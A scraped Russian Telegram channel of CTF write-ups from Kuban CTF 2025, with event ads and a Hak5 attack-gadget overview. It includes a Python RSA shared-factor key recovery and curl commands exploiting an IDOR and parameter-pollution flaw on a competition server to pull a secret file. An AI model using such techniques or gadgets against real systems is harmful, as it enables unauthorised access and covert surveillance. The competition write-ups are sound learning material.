Райтапы по CTF{2025}
2.83K subscribers
215 photos
25 videos
87 files
393 links
☺️ Уютное сообщество для публикации райтапов с разных CTF соревнований и платформ

💬 Наш ламповый чатик: @writeup_chat

✍️ По любому вопросу можно писать мне: @freenameruuuu

Таски решать тут: @writeup_ctf_bot
Download Telegram
Опробовали? Делитесь опытом 🎮
7
Forwarded from Hacker Lab
🚩KubanCTF - 2025: менее 12 дней до начала!

Вы можете найти команду или недостающих участников на наших ресурсах:

✈️ Чат HackerLab

😎 Форум

💬 Discord
——————————
Старт отборочных - 23 августа в 10:00

Призовой фонд увеличен до 1 300 000 рублей!

➡️ Регистрация на Kuban CTF
Please open Telegram to view this post
VIEW IN TELEGRAM
8
Онлайн-конференция ИБ без фильтров

🔥Мероприятие, где говорим о реальных проблемах и ищем практические решения, возвращается!

🗓 14 августа 11:00-15:00 мск ждем на бесплатной онлайн-конференции «ИБ без фильтров»

Что будет полезного?

Честный диалог, нестандартные кейсы и полезный опыт — все без фильтров.

Кому стоит сходить?

Мероприятие для представителей бизнеса от экспертов в области информационной безопасности.

Какие темы затронем?


— Как оценить навыки ИБ-специалиста.
— Как снизить риски с помощью систем класса «менеджеры паролей».
— Как вовлечь разработчиков, сотрудников и бизнес в защиту компании.
— Чем важны разные источники данных при расследовании инцидентов ИБ.

Кто в спикерах:
— Анастасия Федорова. Руководитель образовательных программ, Positive Education
— Кира Шиянова. Менеджер продукта платформы Jet CyberCamp, «Инфосистемы Джет»
— Никита Вьюгин. Менеджер проектов «МКО Системы»
— Валерий Комягин. Генеральный директор BearPass
— и другие эксперты из крупных компаний рынка ИБ

▶️Регистрация по ссылке.
Ждем вас на самый честный диалог по теме ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥32
🔥Я создал команду на CTF от Альфа-банка и приглашаю вас в нее вступить!

Состав команды не ограничен, предлагаю всем каналом залететь и зарешать все задачи и сорвать главный приз. Понакупаем флиперов и пошарим))

🍸 Вот код, залетайте: tL2rOypi5

❗️Указывайте ники как в телеграме, потом разошлю ссылку на вступление в командный чат!

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
243
Forwarded from Standoff 365
Как мы вместе с Юрием Рядниной (circuit) провели CTF «для начинающих» на PHDays Fest и что пошло не так

Во-первых, пришли участвовать далеко не начинающие. Во-вторых, платформа была написана в ChatGPT (и код был не идеальным). А в остальном все прошло отлично!

Конкурс состоял из пяти легких тасков:

• XSS: найти reflected XSS в параметре comment.

• Ошибка округления: накрутить себе денег в интерфейсе, схожем с банковским.

• SSRF: использовать баг в форме загрузки аватарки, чтобы получить локальный файл с флагом.

• Утечка флага: найти флаг, который неожиданно оказался спрятан прямо в коде страницы.

• IDOR: найти уязвимость в мессенджере и пробраться в чат.

Как участники с этим справились — читайте на Хабре.

Спасибо всем, кто пришел! К следующему PHDays Fest подготовим еще что-то интересное 🎉
513
Forwarded from Hacker Lab
🚩 Kuban CTF: соревнования начались!

➡️ https://kubanctf2025.ru/
Please open Telegram to view this post
VIEW IN TELEGRAM
8
Hacker Lab
🚩 Kuban CTF: соревнования начались! ➡️ https://kubanctf2025.ru/
Присылайте ваши райтапы на прошедший Kuban CTF мне, @freenameruuuu

Обязательно опубликую ☺️
Please open Telegram to view this post
VIEW IN TELEGRAM
72
🚩 KubanCTF 2025 — райтапы, ч.1

Авторы:
@nscm21
@freenameruuuu

🌀 | Тест на клавишах
Описание: Лишний помощник, который всех раздражает. В полученном флаге удалить пробелы

Файл с цифрами → телефонная раскладка → T9. 0 = пробел, остальное = буквы. Через онлайн-декодер получаем осмысленный текст.

🥒 | Огурец в банке
Описание: Самое сложное, как всегда, открыть банку.

Бинарник оказался сериализован через Python pickle. После десериализации часть данных в ASCII-кодах → переводим через chr() → собираем строку.

⭐️ | All Stars
Описание: У этого произведения есть Оскар, у главного героя есть звезда в Голливуде, к слову и так много сказано, сможете назвать имя героя, о котором идет речь?

Подсказки: «есть Оскар» и «главный герой имеет звезду на Аллее славы». Таких персонажей мало — проверяем список на Wiki. Название таска намекает на саундтрек. Персонаж большой и зеленый)

🗂 | MFT
Описани: Как Вам такая таблица?

Дамп MFT → анализ через MFTEcmd/MFTExplorer. В истории PowerShell нашли команду, которая писала ASCII-символы. Декодируем — получаем строку.

🤩 | «Автомобиль человека из Останкино»
Описание: Ведущий одного из самых долгоживущих телевизионных шоу на российском ТВ всегда появляется в кадре в классическом костюме, с фирменной улыбкой и лёгкой иронией. Его знают все, но мало кто видел его вне сцены. 
Твоя задача — выяснить, на каком автомобиле он передвигается. Известно, что он нередко приезжает на съёмки в телецентр «Останкино», и его автомобиль — предмет особого внимания охраны. Поговаривают, что номер был специально подобран в стиле «высшего балла» и что на фото он иногда попадает в кадр сзади.

Самое долгоиграющее шоу на российском ТВ это КВН. Гуглим номера ведущего, получаем ответ

👣 | Шаги по следу
Описание: Ты перехватил обрывок письма, содержащего важную информацию. Но оно написано так, чтобы не выдать ничего с первого взгляда. Вот его текст: 
Вчера я посетил Берлин, где сел на 185-ый трамвайный вагон и поехал на экскурсию по музеям. Особенно запомнился 15-й зал, где рассказывали о Римской империи. После этого я поехал на юг, в город, где недавно отмечали 59-летие независимости.
На вокзале я ждал поезд ровно 224 минуты, слушая местного уличного певца, который повторял одно слово снова и снова: "энциклопедия".

Если из текста взять только числа 185, 15, 59, 224 получим IP адрес → открываем в браузере → видим сайт, который и является ответом.

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
125🔥11
task.zip
77.6 KB
#reverse
Сообщение от Санты 🎄🎅


Что же оно означает?
hohowho hohowho howhowho howhoho hohowhow hohohow hohoho hohowhow hohowhow hohoho howhowho howhowhow hohowho hohohow howhoho howhowho hohowhow howhowho howhowho howhoho howhoho hohoho howhowho hohoho hohowhow howhohow howhowho howhowho howhoho hohohow hohohow howhowhow hohowho howhohow howhowho howhoho howhoho hohohow howhohow howhowhow hohowho howhohow howhowho howhohow howhowhow howhohow hohohow hohoho hohohow howhoho hohowho howhohow howhowhow howhohow hohowho hohowhow hohohow howhohow hohoho howhowho howhowhow hohohow howhowho howhoho hohohow howhohow hohoho howhowhow howhowho hohoho hohoho hohoho

Во вложении к таску – приложение, которое прислал Санта...

Формат флага: KFCctf{flag}

Автор: @while_not_False

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot
7
Арсенал для пентестера и red team — аппаратные гаджеты Hak5:

⚡️ WiFi-Pineapple
Точка доступа для атак на Wi-Fi: перехват клиентов, MITM, фишинг, автоматизация сетевых атак.

🦆 USB Rubber Ducky
«Флешка-утка», определяется как клавиатура и вводит полезные нагрузки быстрее человека.

🦈 Shark Jack
Карманный RJ45-гаджет: воткнул в порт — моментальный пентест, сканирование и запуск скриптов.

📺 Screen Crab
Невидимый HDMI-шпион: подключается между ПК и монитором, записывает экран или стримит его.

🐿 Packet Squirrel
Мини-сниффер Ethernet: перехват трафика, VPN-туннель, MITM-атаки.

🐊 Key Croc
USB-кейлоггер: фиксирует ввод с клавиатуры и реагирует на определённые триггеры.

🐰 Bash Bunny
Мощный «швейцарский нож»: LAN, HID, Storage-режимы для комплексных атак и автоматизации.

📚 На все устройства прикладываю официальную документацию в PDF
Сохраняйте! чтобы было удобнее работать в полях
🖱

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
9
#crypto #medium #writeup
Kuban CTF – "Двойная проблема" от @Max_RSC (ТОП-10 на HackerLab)

Перед нами очередная задачка из мира CTF, где дают слегка кривую (точнее — уязвимую) реализацию RSA. В этот раз на входе у нас два модуля n1 и n2, одинаковая публичная экспонента e, и одно зашифрованное сообщение c. Все необходимые данные приведены непосредственно в тексте поста, поэтому отдельный файл не прикладывается.

Ключевой момент: когда дают сразу два разных n, у них может оказаться общий делитель. Если так, то мы фактически получаем одно из простых чисел, из которых складывается модуль n. Безопасность RSA держится на сложности факторизации, и как только мы каким-то образом обошли эту сложность, остальное — детская арифметика. То есть задача опирается на тот факт, что RSA небезопасен, если модули разделяют хотя бы один множитель. Если мы найдем один из множителей, например, p, то после этого сможем легко посчитать функцию Эйлера, найти приватную экспоненту d и расшифровать флаг.

Чтобы найти p, подтягиваем функцию gcd из библиотеки math:
from math import gcd

Подставляем числа, которые даны по условию:
n1 = 85301229878846970301323107702818609695755812591124862399151849850592748938587788039100822431199468780483863005508930154818093365993106028516482945027104435477220021520315775763582770886230113033749748971338316409196598045001663482949869374010947883957820793242137793210215930782186351794325806945717508347881
n2 = 109513893064865824312887126037695992618837379743053225051510712684706298394844250173030307725980622229363463153247419002611731684061578669993893758240971054995662819118490841792391822485215186261857628830400956404892168386609596159676364114308057445982469895464743365411603666960249026127185036946732158072467
e = 65537
c = 80523060741828874775927939583674208314359823391190778967023421748976347340246911181413681174368696929906966394615901583879335335760357963720615301569603850444832668348817460953008596314270793433890476685628856002996942980704863201169642782967237984763737464120837902881702995220342897353879003315047260081532

Вычисляем общий делитель:
p = gcd(n1, n2)

Теперь у нас на выбор два пути: либо закинуть все это добро в онлайн‑сервис (вроде dcode.fr) и быстро получить результат, либо честно проделать руками в Python — ради спортивного интереса займемся вторым (хотя на соревнованиях я выбираю первое :D)

Находим второй множитель для n1. Про n2 в данном случае можно смело забыть — он уже отработал свое:
q = n1 // p

Считаем значение функции Эйлера, то есть phi от n1:
phi_n1 = (p - 1) * (q - 1)

Далее вычисляем приватную экспоненту:
d = pow(e, -1, phi_n1)

Ну и кульминация: расшифровываем сообщение:
m = pow(c, d, n1)

Остался финальный штрих — превратить число в строку. Новичков может сбить с толку момент с bytes.fromhex(...). Дело в том, что функция ждет строку из шестнадцатеричных символов. Когда мы пишем hex(m), то получаем строку вида '0x...'. Поэтому [2:] аккуратно обрезает приставку '0x', и тогда все работает без ошибок:
flag = bytes.fromhex(hex(m)[2:])
print(flag)


💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
30🔥72
corpfiles_src.zip
32.6 KB
#web #medium #writeup
Kuban CTF – "Корпоративное хранилище" от @LiamSOMHOLD

Это не просто папки и файлы, это настоящая крепость... ну, или так кажется. Попытайся не спалиться и докопаться до сокровищ. Кто знает, может, там и не только отчёты по бюджету.

Формат флага: CSC{...}


Есть две уязвимости это ошибка в обработке user_id в /api/files (То есть можно подставить два user_id и обмануть проверку) и отсутствие проверки владельца при загрузке файла /file/<file_id>
curl -s "http://62.173.139.193:16003/api/files?user_id=1&user_id=23" \
  -H "Cookie: session=eyJ1c2VyX2lkIjoyM30.aKmUNw.Rm7rIOuABeAEHoyrtOGu-w-GoOQ"

И получил ответ
{"files":[{"file_id":"b00b73ebe000","filename":"secret.txt"}]}

Ну и дальше
curl -s "http://62.173.139.193:16003/file/b00b73ebe000" \
  -H "Cookie: session=eyJ1c2VyX2lkIjoyM30.aKmUNw.Rm7rIOuABeAEHoyrtOGu-w-GoOQ"

И будет сам флаг.

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14